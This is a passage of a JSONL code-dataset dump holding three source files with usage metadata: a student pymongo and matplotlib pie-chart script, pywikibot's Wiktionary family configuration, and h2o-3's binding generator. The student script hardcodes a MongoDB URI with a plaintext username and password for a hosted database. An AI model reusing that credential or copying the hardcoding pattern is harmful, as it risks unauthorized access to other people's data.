"usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 161, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.SUCCESS", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 170, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.testresult.TestResult", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "27106865213", "text": "from matplotlib import pyplot\nfrom pymongo import MongoClient\nuri = \"mongodb://admin:admin@ds021182.mlab.com:21182/c4e\"\nclient = 
MongoClient(uri)\ndb = client.get_database()\ncustomers_collection = db[\"customers\"]\ncount_events = 0\ncount_ads = 0\ncount_wom = 0\nfor i in customers_collection.find():\n if i[\"ref\"].count(\"events\") == 1:\n count_events += 1\n elif i[\"ref\"].count(\"ads\") == 1:\n count_ads += 1\n elif i[\"ref\"].count(\"wom\") == 1:\n count_wom += 1\n\ncustomers_ref_counts = [count_events, count_ads, count_wom]\ncustomers_ref_names = [\"events\", \"ads\", \"wom\"]\nprint(customers_ref_names, customers_ref_counts)\n\npyplot.pie(customers_ref_counts, labels=customers_ref_names, autopct=\"%.0f%%\", shadow=True, explode=[0, 0.1, 0])\npyplot.title(\"References\")\npyplot.axis(\"equal\")\n\npyplot.show()\n\nclient.close()", "repo_name": "nmhoangg2000/lab-c4e24", "sub_path": "lab1/homework/se4.py", "file_name": "se4.py", "file_ext": "py", "file_size_in_byte": 828, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "71562023874", "text": "# -*- coding: utf-8 -*-\n\"\"\"Family module for Wiktionary.\"\"\"\n#\n# (C) Pywikibot team, 2005-2018\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import absolute_import, unicode_literals\n\nfrom pywikibot import family\n\n\n# The Wikimedia family that is known as Wiktionary\nclass Family(family.SubdomainFamily, family.WikimediaFamily):\n\n \"\"\"Family class for Wiktionary.\"\"\"\n\n name = 'wiktionary'\n\n closed_wikis = [\n # See https://noc.wikimedia.org/conf/highlight.php?file=closed.dblist\n 'aa', 'ab', 'ak', 'als', 'as', 'av', 'ba', 'bh', 'bi', 'bm', 'bo',\n 'ch', 'cr', 'dz', 'ik', 'mh', 'mo', 'pi', 'rm', 'rn', 'sc', 'sn',\n 'to', 'tw', 'xh', 'yo', 'za',\n ]\n\n removed_wikis = [\n # See https://noc.wikimedia.org/conf/highlight.php?file=deleted.dblist\n 'dk', 'ba', 'tlh', 'tokipona',\n ]\n\n def __init__(self):\n \"\"\"Initializer.\"\"\"\n self.languages_by_size = [\n 'en', 'mg', 'fr', 'sh', 'ru', 'es', 'zh', 'de', 'nl', 'lt', 'sv',\n 'ku', 'pl', 'el', 'it', 'ta', 'hu', 'fi', 'tr', 'ca', 'ko', 'io',\n 'kn', 'pt', 'hy', 'vi', 'sr', 'ja', 'chr', 'hi', 'th', 'ro', 'no',\n 'ml', 'id', 'et', 'uz', 'li', 'my', 'or', 'te', 'fa', 'cs', 'eo',\n 'ar', 'jv', 'az', 'eu', 'gl', 'oc', 'da', 'lo', 'br', 'uk', 'hr',\n 'fj', 'tg', 'bg', 'simple', 'ps', 'cy', 'sk', 'vo', 'wa', 'is',\n 'zh-min-nan', 'la', 'scn', 'af', 'he', 'ast', 'tl', 'ky', 'sw',\n 'fy', 'nn', 'lv', 'co', 'pnb', 'mn', 'pa', 'ka', 'nds', 'sl', 'sq',\n 'lb', 'bs', 'nah', 'sa', 'kk', 'bn', 'tk', 'km', 'sm', 'mk', 'hsb',\n 'be', 'ms', 'ga', 'ur', 'an', 'wo', 'vec', 'ang', 'tt', 'sd', 'gn',\n 'mr', 'so', 'csb', 'ug', 'gd', 'mt', 'st', 'roa-rup', 'si', 'hif',\n 'ia', 'ie', 'mi', 'ay', 'kl', 'fo', 'jbo', 'ln', 'zu', 'na', 'gu',\n 'gv', 'kw', 'rw', 'ts', 'ne', 'om', 'qu', 'su', 'ss', 'ha', 'iu',\n 'am', 'dv', 'tpi', 
'yi', 'ti', 'sg', 'tn', 'ks',\n ]\n\n super(Family, self).__init__()\n\n self.category_redirect_templates = {\n '_default': (),\n 'zh': ('分类重定向',),\n }\n\n # Global bot allowed languages on\n # https://meta.wikimedia.org/wiki/BPI#Current_implementation\n # & https://meta.wikimedia.org/wiki/Special:WikiSets/2\n self.cross_allowed = [\n 'am', 'af', 'am', 'ang', 'an', 'ar', 'ast', 'ay', 'az', 'be',\n 'bg', 'bn', 'br', 'bs', 'ca', 'chr', 'co', 'csb', 'cs', 'cy',\n 'da', 'dv', 'el', 'eo', 'es', 'et', 'eu', 'fa', 'fi', 'fj', 'fo',\n 'fy', 'ga', 'gd', 'gl', 'gn', 'gu', 'gv', 'ha', 'hsb', 'hu', 'hy',\n 'ia', 'id', 'ie', 'io', 'iu', 'jbo', 'jv', 'ka', 'kk', 'kl', 'km',\n 'kn', 'ko', 'ks', 'ku', 'kw', 'ky', 'la', 'lb', 'ln', 'lo', 'lt',\n 'lv', 'mg', 'mi', 'mk', 'ml', 'mn', 'ms', 'mt', 'my', 'nah', 'na',\n 'nds', 'ne', 'nl', 'nn', 'no', 'oc', 'om', 'or', 'pa', 'pnb',\n 'ps', 'pt', 'qu', 'roa_rup', 'rw', 'sa', 'scn', 'sd', 'sg', 'sh',\n 'simple', 'si', 'sk', 'sl', 'sm', 'so', 'sq', 'sr', 'ss', 'st',\n 'su', 'sv', 'sw', 'ta', 'te', 'tg', 'th', 'ti', 'tk', 'tl', 'tn',\n 'tpi', 'tr', 'ts', 'tt', 'ug', 'uk', 'ur', 'uz', 'vec', 'vi', 'vo',\n 'wa', 'wo', 'yi', 'zh_min_nan', 'zh', 'zu',\n ]\n\n # Other than most Wikipedias, page names must not start with a capital\n # letter on ALL Wiktionaries.\n self.nocapitalize = list(self.langs.keys())\n\n # Which languages have a special order for putting interlanguage links,\n # and what order is it? If a language is not in interwiki_putfirst,\n # alphabetical order on language code is used. For languages that are in\n # interwiki_putfirst, interwiki_putfirst is checked first, and\n # languages are put in the order given there. All other languages are\n # put after those, in code-alphabetical order.\n\n self.alphabetic_sv = [\n 'aa', 'af', 'ak', 'als', 'an', 'roa-rup', 'ast', 'gn', 'ay', 'az',\n 'id', 'ms', 'bm', 'zh-min-nan', 'jv', 'su', 'mt', 'bi', 'bo', 'bs',\n 'br', 'ca', 'cs', 'ch', 'sn', 'co', 'za', 'cy', 'da', 'de', 'na',\n 'mh', 'et', 'ang', 'en', 'es', 'eo', 'eu', 'to', 'fr', 'fy', 'fo',\n 'ga', 'gv', 'sm', 'gd', 'gl', 'hr', 'io', 'ia', 'ie', 'ik', 'xh',\n 'is', 'zu', 'it', 'kl', 'csb', 'kw', 'rw', 'rn', 'sw', 'ky', 'ku',\n 'la', 'lv', 'lb', 'lt', 'li', 'ln', 'jbo', 'hu', 'mg', 'mi', 'mo',\n 'my', 'fj', 'nah', 'nl', 'cr', 'no', 'nn', 'hsb', 'oc', 'om', 'ug',\n 'uz', 'nds', 'pl', 'pt', 'ro', 'rm', 'qu', 'sg', 'sc', 'st', 'tn',\n 'sq', 'scn', 'simple', 'ss', 'sk', 'sl', 'so', 'sh', 'fi', 'sv',\n 'tl', 'tt', 'vi', 'tpi', 'tr', 'tw', 'vo', 'wa', 'wo', 'ts', 'yo',\n 'el', 'av', 'ab', 'ba', 'be', 'bg', 'mk', 'mn', 'ru', 'sr', 'tg',\n 'uk', 'kk', 'hy', 'yi', 'he', 'ur', 'ar', 'tk', 'sd', 'fa', 'ha',\n 'ps', 'dv', 'ks', 'ne', 'pi', 'bh', 'mr', 'sa', 'hi', 'as', 'bn',\n 'pa', 'pnb', 'gu', 'or', 'ta', 'te', 'kn', 'ml', 'si', 'th', 'lo',\n 'dz', 'ka', 'ti', 'am', 'chr', 'iu', 'km', 'zh', 'ja', 'ko',\n ]\n\n self.interwiki_putfirst = {\n 'da': self.alphabetic,\n 'en': self.alphabetic,\n 'et': self.alphabetic,\n 'fi': self.alphabetic,\n 'fy': self.fyinterwiki,\n 'he': ['en'],\n 'hu': ['en'],\n 'ms': self.alphabetic_revised,\n 'pl': self.alphabetic_revised,\n 'sv': self.alphabetic_sv,\n 'simple': self.alphabetic,\n }\n\n self.interwiki_on_one_line = ['pl']\n\n self.interwiki_attop = ['pl']\n\n # Subpages for documentation.\n # TODO: List is incomplete, to be completed for missing languages.\n self.doc_subpages = {\n '_default': ((u'/doc', ),\n ['en']\n ),\n }\n", "repo_name": "joomla-projects/gsoc17_helpscreens_pywiki", "sub_path": 
"pywikibot/families/wiktionary_family.py", "file_name": "wiktionary_family.py", "file_ext": "py", "file_size_in_byte": 6076, "program_lang": "python", "lang": "tg", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pywikibot.family.SubdomainFamily", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pywikibot.family", "line_number": 14, "usage_type": "name"}, {"api_name": "pywikibot.family.WikimediaFamily", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "13336343714", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom copy import deepcopy\nfrom functools import partial\nfrom io import StringIO\nfrom inspect import getsource\nfrom pprint import pformat\nimport sys\n\nimport bindings as bi\nfrom custom import get_customizations_for, reformat_block\n\nstr_type = str\nget_customizations_for = partial(get_customizations_for, 'python')\n\n\ndef get_customizations_or_defaults_for(algo, prop, default=None):\n return get_customizations_for(algo, prop, get_customizations_for('defaults', prop, default))\n\n\ndef code_as_str(code):\n if code is None:\n return None\n if isinstance(code, str):\n return code\n if callable(code):\n return '\\n'.join(getsource(code).splitlines()[1:])\n raise AssertionError(\"`code` param should be a string or a function definition\")\n\n\n# We specify these not as real types, but as parameter annotations in the docstrings\nclass PythonTypeTranslatorForCheck(bi.TypeTranslator):\n def __init__(self):\n super(PythonTypeTranslatorForCheck, self).__init__()\n self.types[\"byte\"] = \"int\"\n self.types[\"short\"] = \"int\"\n self.types[\"long\"] = \"int\"\n self.types[\"double\"] = \"numeric\"\n self.types[\"string\"] = \"str\"\n self.types[\"boolean\"] = \"bool\"\n self.types[\"Polymorphic\"] = \"object\"\n self.types[\"Object\"] = \"object\"\n self.types[\"VecSpecifier\"] = \"str\"\n self.types[\"BlendingParams\"] = \"dict\"\n self.types[\"StringPair\"] = \"tuple\"\n self.types[\"KeyValue\"] = \"dict\"\n self.make_array = lambda vtype: \"dict\" if vtype == \"dict\" else \"[%s]\" % vtype\n self.make_array2 = lambda vtype: \"[[%s]]\" % vtype\n self.make_map = lambda ktype, vtype: \"{%s: %s}\" % (ktype, vtype)\n self.make_key = lambda itype, schema: (\"str, H2OFrame\" if schema == \"Key\"\n else \"str, H2OEstimator\" if schema == \"Key\"\n else \"str\")\n self.make_enum = lambda schema, values: (\"Enum(%s)\" % \", \".join(stringify(v) for v in values) if values\n else schema)\n\n\ntype_adapter1 = PythonTypeTranslatorForCheck()\n\n\ndef translate_type_for_check(h2o_type, values=None):\n schema = h2o_type.replace(\"[]\", \"\")\n return type_adapter1.translate(h2o_type, schema, values)\n\n\n# We specify these not as real types, but as parameter annotations in the docstrings\nclass PythonTypeTranslatorForDoc(bi.TypeTranslator):\n def __init__(self):\n super(PythonTypeTranslatorForDoc, self).__init__()\n self.types[\"byte\"] = \"int\"\n self.types[\"short\"] = \"int\"\n self.types[\"long\"] = \"int\"\n self.types[\"double\"] = \"float\"\n self.types[\"string\"] = \"str\"\n self.types[\"boolean\"] = \"bool\"\n self.types[\"Polymorphic\"] = \"object\"\n self.types[\"Object\"] = \"object\"\n self.types[\"VecSpecifier\"] = \"str\"\n self.types[\"BlendingParams\"] = \"dict\"\n self.types[\"StringPair\"] = \"tuple\"\n self.types[\"KeyValue\"] = \"dict\"\n self.make_array = lambda vtype: \"dict\" if vtype == \"dict\" else \"List[%s]\" % vtype\n self.make_array2 = lambda vtype: \"List[List[%s]]\" % vtype\n 
self.make_map = lambda ktype, vtype: \"Dict[%s, %s]\" % (ktype, vtype)\n self.make_key = lambda itype, schema: (\"Union[None, str, H2OFrame]\" if schema == \"Key\"\n else \"Union[None, str, H2OEstimator]\" if schema == \"Key\"\n else \"str\")\n self.make_enum = lambda schema, values: (\"Literal[%s]\" % \", \".join(stringify(v) for v in values) if values # see PEP-586\n else schema)\n\n\ntype_adapter2 = PythonTypeTranslatorForDoc()\n\n\ndef translate_type_for_doc(h2o_type, values=None):\n schema = h2o_type.replace(\"[]\", \"\")\n return type_adapter2.translate(h2o_type, schema, values)\n\n\ndef normalize_enum_constant(s):\n \"\"\"Return enum constant `s` converted to a canonical snake-case.\"\"\"\n if s.islower(): return s\n if s.isupper(): return s.lower()\n return \"\".join(ch if ch.islower() else \"_\" + ch.lower() for ch in s).strip(\"_\")\n\n\ndef stringify(v, infinity=u'∞'):\n if v is None:\n return None\n if v == \"Infinity\":\n return infinity\n if isinstance(v, str_type):\n return '\"{}\"'.format(v)\n if isinstance(v, int):\n if v > (1 << 62): # handle Long.MAX_VALUE case \n return infinity\n return str(v)\n if isinstance(v, float): \n if v > (1 << 128): # handle Double.MAX_VALUE case\n return infinity\n return \"{:.10}\".format(v)\n return str(v)\n\n\n# This is the list of all reserved keywords in Python. It is a syntax error to use any of them as an object's property.\n# Currently we have only \"lambda\" in GLM as a violator, but keeping the whole list here just to be future-proof.\n# For all such violating properties, we name the accessor with an underscore at the end (eg. lambda_), but at the same\n# time keep the actual name in self.params (i.e. model.lambda_ ≡ model.params[\"lambda\"]).\nreserved_words = {\n \"and\", \"del\", \"from\", \"not\", \"while\", \"as\", \"elif\", \"global\", \"or\", \"with\", \"assert\", \"else\", \"if\", \"pass\",\n \"yield\", \"break\", \"except\", \"import\", \"print\", \"class\", \"exec\", \"in\", \"raise\", \"continue\", \"finally\", \"is\",\n \"return\", \"def\", \"for\", \"lambda\", \"try\"\n}\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Generate per-model classes\n# ----------------------------------------------------------------------------------------------------------------------\ndef gen_module(schema, algo):\n \"\"\"\n Ideally we should be able to avoid logic specific to algos in this file.\n Instead, customizations are externalized in ./python/gen_{algo}.py files.\n Logic that is specific to python types (e.g. H2OFrame, enums as list...) 
should however stay here\n as the type translation is done in this file.\n \"\"\"\n classname = algo_to_classname(algo)\n extra_imports = get_customizations_for(algo, 'extensions.__imports__')\n class_doc = get_customizations_for(algo, 'doc.__class__')\n class_examples = get_customizations_for(algo, 'examples.__class__')\n class_extras = get_customizations_for(algo, 'extensions.__class__')\n module_extras = get_customizations_for(algo, 'extensions.__module__')\n\n update_param_defaults = get_customizations_for('defaults', 'update_param')\n update_param = get_customizations_for(algo, 'update_param')\n deprecated_params = get_customizations_for(algo, 'deprecated_params', {})\n\n def extend_schema_params(param):\n pname = param.get('name')\n param = deepcopy(param)\n updates = None\n for update_fn in [update_param, update_param_defaults]:\n if callable(update_fn):\n updates = update_fn(pname, param)\n if updates is not None:\n param = updates\n break\n # return param if isinstance(param, (list, tuple)) else [param] # always return array to support deprecated aliases\n return param\n\n extended_params = [extend_schema_params(p) for p in schema['parameters']]\n\n param_names = []\n for param in extended_params:\n pname = param.get('name')\n ptype = param.get('type')\n pvalues = param.get('values')\n pdefault = param.get('default_value')\n\n assert (ptype[:4] == 'enum') == bool(pvalues), \"Values are expected for enum types only\"\n if pvalues:\n enum_values = [normalize_enum_constant(p) for p in pvalues]\n if pdefault:\n pdefault = normalize_enum_constant(pdefault)\n else:\n enum_values = None\n\n if pname in reserved_words:\n pname += \"_\"\n param_names.append(pname)\n param['pname'] = pname\n param['default_value'] = pdefault\n param['ptype'] = translate_type_for_check(ptype, enum_values)\n param['dtype'] = translate_type_for_doc(ptype, enum_values)\n \n if deprecated_params:\n extended_params = [p for p in extended_params if p['pname'] not in deprecated_params.keys()]\n\n yield \"#!/usr/bin/env python\"\n yield \"# -*- encoding: utf-8 -*-\"\n yield \"#\"\n yield \"# This file is auto-generated by h2o-3/h2o-bindings/bin/gen_python.py\"\n yield \"# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)\"\n yield \"#\"\n yield \"\"\n if deprecated_params:\n yield \"from h2o.utils.metaclass import deprecated_params, deprecated_property\"\n if extra_imports:\n yield reformat_block(extra_imports)\n yield \"from h2o.estimators.estimator_base import H2OEstimator\"\n yield \"from h2o.exceptions import H2OValueError\"\n yield \"from h2o.frame import H2OFrame\"\n yield \"from h2o.utils.typechecks import assert_is_type, Enum, numeric\"\n yield \"\"\n yield \"\"\n yield \"class %s(H2OEstimator):\" % classname\n yield ' \"\"\"'\n yield \" \" + schema[\"algo_full_name\"]\n yield \"\"\n if class_doc:\n yield reformat_block(class_doc, 4)\n if class_examples:\n yield \"\"\n yield \" :examples:\"\n yield \"\"\n yield reformat_block(class_examples, 4)\n yield ' \"\"\"'\n yield \"\"\n yield ' algo = \"%s\"' % algo\n yield \" supervised_learning = %s\" % get_customizations_for(algo, 'supervised_learning', True)\n options = get_customizations_for(algo, 'options')\n if options:\n yield \" _options_ = %s\" % reformat_block(pformat(options), prefix=' '*16, prefix_first=False)\n yield \"\"\n if deprecated_params:\n yield reformat_block(\"@deprecated_params(%s)\" % deprecated_params, indent=4)\n init_sig = \"def __init__(self,\\n%s\\n):\" % \"\\n\".join(\"%s=%s, # type: %s\" \n % (name, default, 
\"Optional[%s]\" % type if default is None else type) \n for name, default, type \n in [(p.get('pname'),\n stringify(p.get('default_value'), infinity=None),\n p.get('dtype'))\n for p in extended_params])\n yield reformat_block(init_sig, indent=4, prefix=' '*13, prefix_first=False)\n yield ' \"\"\"'\n for p in extended_params:\n pname, pdefault, dtype, pdoc = p.get('pname'), stringify(p.get('default_value')), p.get('dtype'), p.get('help')\n pdesc = \"%s: %s\\nDefaults to ``%s``.\" % (pname, pdoc, pdefault)\n pident = ' '*15\n yield \" :param %s\" % bi.wrap(pdesc, indent=pident, indent_first=False)\n yield \" :type %s: %s%s\" % (pname, \n bi.wrap(dtype, indent=pident, indent_first=False),\n \", optional\" if pdefault is None else \"\")\n yield ' \"\"\"'\n yield \" super(%s, self).__init__()\" % classname\n yield \" self._parms = {}\"\n for p in extended_params:\n pname = p.get('pname')\n if pname == 'model_id':\n yield \" self._id = self._parms['model_id'] = model_id\"\n else:\n yield \" self.%s = %s\" % (pname, pname)\n rest_api_version = get_customizations_for(algo, 'rest_api_version')\n if rest_api_version:\n yield ' self._parms[\"_rest_version\"] = %s' % rest_api_version\n yield \"\"\n for param in extended_params:\n pname = param.get('pname')\n if pname == \"model_id\":\n continue # The getter is already defined in ModelBase\n sname = pname[:-1] if pname[-1] == '_' else pname\n ptype = param.get('ptype')\n dtype = param.get('dtype')\n pdefault = param.get('default_value')\n\n if dtype.startswith(\"Enum\"):\n vals = dtype[5:-1].split(\", \")\n property_doc = \"One of: \" + \", \".join(\"``%s``\" % v for v in vals)\n else:\n property_doc = \"Type: ``%s``\" % dtype\n property_doc += (\".\" if pdefault is None else \", defaults to ``%s``.\" % stringify(pdefault))\n\n yield \" @property\"\n yield \" def %s(self):\" % pname\n yield ' \"\"\"'\n yield bi.wrap(param.get('help'), indent=8*' ') # we need to wrap only for text coming from server\n yield \"\"\n yield bi.wrap(property_doc, indent=8*' ')\n custom_property_doc = get_customizations_for(algo, \"doc.{}\".format(pname))\n if custom_property_doc:\n yield \"\"\n yield reformat_block(custom_property_doc, 8)\n property_examples = get_customizations_for(algo, \"examples.{}\".format(pname))\n if property_examples:\n yield \"\"\n yield \" :examples:\"\n yield \"\"\n yield reformat_block(property_examples, 8)\n yield ' \"\"\"'\n property_getter = get_customizations_or_defaults_for(algo, \"overrides.{}.getter\".format(pname)) # check gen_stackedensemble.py for an example\n if property_getter:\n yield reformat_block(property_getter.format(**locals()), 8)\n else:\n yield \" return self._parms.get(\\\"%s\\\")\" % sname\n\n yield \"\"\n yield \" @%s.setter\" % pname\n yield \" def %s(self, %s):\" % (pname, pname)\n property_setter = get_customizations_or_defaults_for(algo, \"overrides.{}.setter\".format(pname)) # check gen_stackedensemble.py for an example\n if property_setter:\n yield reformat_block(property_setter.format(**locals()), 8)\n elif \"H2OFrame\" in ptype: \n yield \" self._parms[\\\"%s\\\"] = H2OFrame._validate(%s, '%s')\" % (sname, pname, pname)\n else:\n yield \" assert_is_type(%s, None, %s)\" % (pname, ptype)\n yield \" self._parms[\\\"%s\\\"] = %s\" % (sname, pname)\n yield \"\"\n \n for old, new in deprecated_params.items():\n new_name = new[0] if isinstance(new, tuple) else new\n yield \" %s = deprecated_property('%s', %s)\" % (old, old, new)\n \n yield \"\"\n if class_extras:\n yield reformat_block(code_as_str(class_extras), 4)\n if 
module_extras:\n yield \"\"\n yield reformat_block(code_as_str(module_extras))\n\n\ndef algo_to_classname(algo):\n if algo == \"coxph\": return \"H2OCoxProportionalHazardsEstimator\"\n if algo == \"deeplearning\": return \"H2ODeepLearningEstimator\"\n if algo == \"xgboost\": return \"H2OXGBoostEstimator\"\n if algo == \"infogram\": return \"H2OInfogram\"\n if algo == \"gbm\": return \"H2OGradientBoostingEstimator\"\n if algo == \"glm\": return \"H2OGeneralizedLinearEstimator\"\n if algo == \"glrm\": return \"H2OGeneralizedLowRankEstimator\"\n if algo == \"kmeans\": return \"H2OKMeansEstimator\"\n if algo == \"naivebayes\": return \"H2ONaiveBayesEstimator\"\n if algo == \"drf\": return \"H2ORandomForestEstimator\"\n if algo == \"upliftdrf\": return \"H2OUpliftRandomForestEstimator\"\n if algo == \"svd\": return \"H2OSingularValueDecompositionEstimator\"\n if algo == \"pca\": return \"H2OPrincipalComponentAnalysisEstimator\"\n if algo == \"stackedensemble\": return \"H2OStackedEnsembleEstimator\"\n if algo == \"isolationforest\": return \"H2OIsolationForestEstimator\"\n if algo == \"extendedisolationforest\": return \"H2OExtendedIsolationForestEstimator\"\n if algo == \"dt\": return \"H2ODecisionTreeEstimator\"\n if algo == \"psvm\": return \"H2OSupportVectorMachineEstimator\"\n if algo == \"gam\": return \"H2OGeneralizedAdditiveEstimator\"\n if algo == \"anovaglm\": return \"H2OANOVAGLMEstimator\"\n if algo == \"targetencoder\": return \"H2OTargetEncoderEstimator\"\n if algo == \"rulefit\": return \"H2ORuleFitEstimator\"\n if algo == \"modelselection\": return \"H2OModelSelectionEstimator\"\n if algo == \"isotonicregression\": return \"H2OIsotonicRegressionEstimator\"\n if algo == \"adaboost\": return \"H2OAdaBoostEstimator\"\n return \"H2O\" + algo.capitalize() + \"Estimator\"\n\n\ndef gen_init(modules):\n yield \"#!/usr/bin/env python\"\n yield \"# -*- encoding: utf-8 -*-\"\n yield \"#\"\n yield \"# This file is auto-generated by h2o-3/h2o-bindings/bin/gen_python.py\"\n yield \"# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)\"\n yield \"#\"\n yield \"import inspect\"\n yield \"import sys\"\n yield \"\"\n module_strs = []\n # imports estimators\n for full_module, module, clz, category in sorted(modules):\n if module in [\"grid\", \"automl\"]:\n continue\n module_strs.append('\"%s\"' % clz)\n yield \"from .%s import %s\" % (module, clz)\n # global methods for h2o.estimators module\n yield \"\"\"\n\nmodule = sys.modules[__name__]\n\n\ndef _algo_for_estimator_(shortname, cls):\n if shortname == 'H2OAutoEncoderEstimator':\n return 'autoencoder'\n return cls.algo\n\n\n_estimator_cls_by_algo_ = {_algo_for_estimator_(name, cls): cls\n for name, cls in inspect.getmembers(module, inspect.isclass)\n if hasattr(cls, 'algo')}\n\n\ndef create_estimator(algo, **params):\n if algo not in _estimator_cls_by_algo_:\n raise ValueError(\"Unknown algo type: \" + algo)\n return _estimator_cls_by_algo_[algo](**params)\n\n\"\"\"\n # auto-exports\n yield \"__all__ = (\"\n yield bi.wrap('\"create_estimator\",', indent=\" \"*4)\n yield bi.wrap(\", \".join(module_strs), indent=\" \"*4)\n yield \")\"\n\n\ndef gen_models_docs(modules):\n yield \".. 
This file is autogenerated from gen_python.py, DO NOT MODIFY\"\n yield \"\"\n yield \":tocdepth: 3\"\n yield \"\"\n yield \"Modeling In H2O\"\n yield \"===============\"\n modules_with_globals = ['automl']\n for cat in [\"Supervised\", \"Unsupervised\", \"Miscellaneous\"]:\n yield \"\"\n yield cat\n yield \"+\" * len(cat)\n yield \"\"\n for full_module, module, clz, category in sorted(modules):\n if category != cat: continue\n # doc for module\n if module in modules_with_globals:\n yield \":mod:`%s`\" % module\n yield \"-\" * (7 + len(module))\n yield \".. automodule:: %s\" % full_module\n yield \" :members:\"\n yield \" :exclude-members: %s\" % clz\n yield \"\"\n # doc for class\n full_clz = '.'.join([full_module, clz])\n yield \":mod:`%s`\" % clz\n yield \"-\" * (7 + len(clz))\n yield \".. autoclass:: %s\" % full_clz\n yield \" :show-inheritance:\"\n yield \" :members:\"\n yield \"\"\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# MAIN:\n# ----------------------------------------------------------------------------------------------------------------------\ndef main():\n bi.init(\"Python\", \"../../../h2o-py/h2o/estimators\", clear_dir=False)\n\n modules = [(\"h2o.estimators.deeplearning\", \"deeplearning\", \"H2OAutoEncoderEstimator\", \"Unsupervised\"),\n (\"h2o.estimators.estimator_base\", \"estimator_base\", \"H2OEstimator\", \"Miscellaneous\"),\n (\"h2o.grid\", \"grid\", \"H2OGridSearch\", \"Miscellaneous\"),\n (\"h2o.automl\", \"automl\", \"H2OAutoML\", \"Miscellaneous\")]\n builders = bi.model_builders().items()\n algo_to_module = dict(\n drf=\"random_forest\",\n naivebayes=\"naive_bayes\",\n isolationforest=\"isolation_forest\",\n extendedisolationforest=\"extended_isolation_forest\",\n dt=\"decision_tree\",\n upliftdrf=\"uplift_random_forest\",\n modelselection=\"model_selection\"\n )\n algo_to_category = dict(\n svd=\"Miscellaneous\",\n word2vec=\"Miscellaneous\"\n )\n for name, mb in builders:\n module = name\n if name in algo_to_module:\n module = algo_to_module[name]\n bi.vprint(\"Generating model: \" + name)\n bi.write_to_file(\"%s.py\" % module, gen_module(mb, name))\n category = algo_to_category[name] if name in algo_to_category \\\n else \"Supervised\" if mb[\"supervised\"] \\\n else \"Unsupervised\"\n full_module = '.'.join([\"h2o.estimators\", module])\n modules.append((full_module, module, algo_to_classname(name), category))\n\n bi.write_to_file(\"__init__.py\", gen_init(modules))\n bi.write_to_file(\"../../docs/modeling.rst\", gen_models_docs(modules))\n\n type_adapter1.vprint_translation_map()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-bindings/bin/gen_python.py", "file_name": "gen_python.py", "file_ext": "py", "file_size_in_byte": 20598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "custom.get_customizations_for", "line_number": 14, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 14, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 27, "usage_type": "call"}, {"api_name": "bindings.TypeTranslator", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bindings.TypeTranslator", "line_number": 66, "usage_type": "attribute"}, {"api_name": "custom.get_customizations_for", "line_number": 146, "usage_type": "call"}, 
{"api_name": "custom.get_customizations_for", "line_number": 147, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 148, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 149, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 150, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 152, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 153, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 154, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 158, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 207, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 219, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 224, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 228, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 229, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 231, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 231, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 234, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 242, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 248, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 250, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 261, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 284, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 286, "usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 287, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 290, 